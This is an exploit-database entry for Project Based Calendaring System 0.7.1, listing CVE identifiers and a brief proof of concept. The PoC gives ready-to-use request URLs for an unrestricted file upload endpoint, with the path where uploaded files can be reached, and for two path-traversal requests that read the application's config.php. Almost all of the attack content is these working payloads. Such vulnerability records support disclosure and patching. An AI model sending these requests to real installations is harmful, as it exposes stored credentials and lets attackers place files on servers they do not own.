[] NeoSense

Project Based Calendaring System (PBCS) 0.7.1 - Multiple Vulnerabilities

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2008-04-29 
date_updated:  
verified: 1 
codes: OSVDB-45391;CVE-2008-2216;OSVDB-44887;OSVDB-44886;CVE-2008-2215 
tags: 
aliases:  
screenshot_url:  
application_url: 

Project Based Calendaring System (PBCS) Version 0.7.1 Multiple Vulnerabilities
Script: http://www.pbcs.org/pbcs_download.php
Poc :
Hi str0ke Thanx To Posted but I Want Add Some Vulns In This Script
1- remote file upload
http://localhost/pbcs-0.7.1-1/src/yopy_upload.php
after upload you can get you file on
http://localhost/pbcs-0.7.1-1//tmp/uploads/name your file
2- remote file disclosure
http://localhost/pbcs-0.7.1-1/src/yopy_sync.php?download_file=0&filename=../config/config.php
3- file disclosure
/plugins/system-logger/print_logs.php?filename=../../config/config.php

# milw0rm.com [2008-04-30]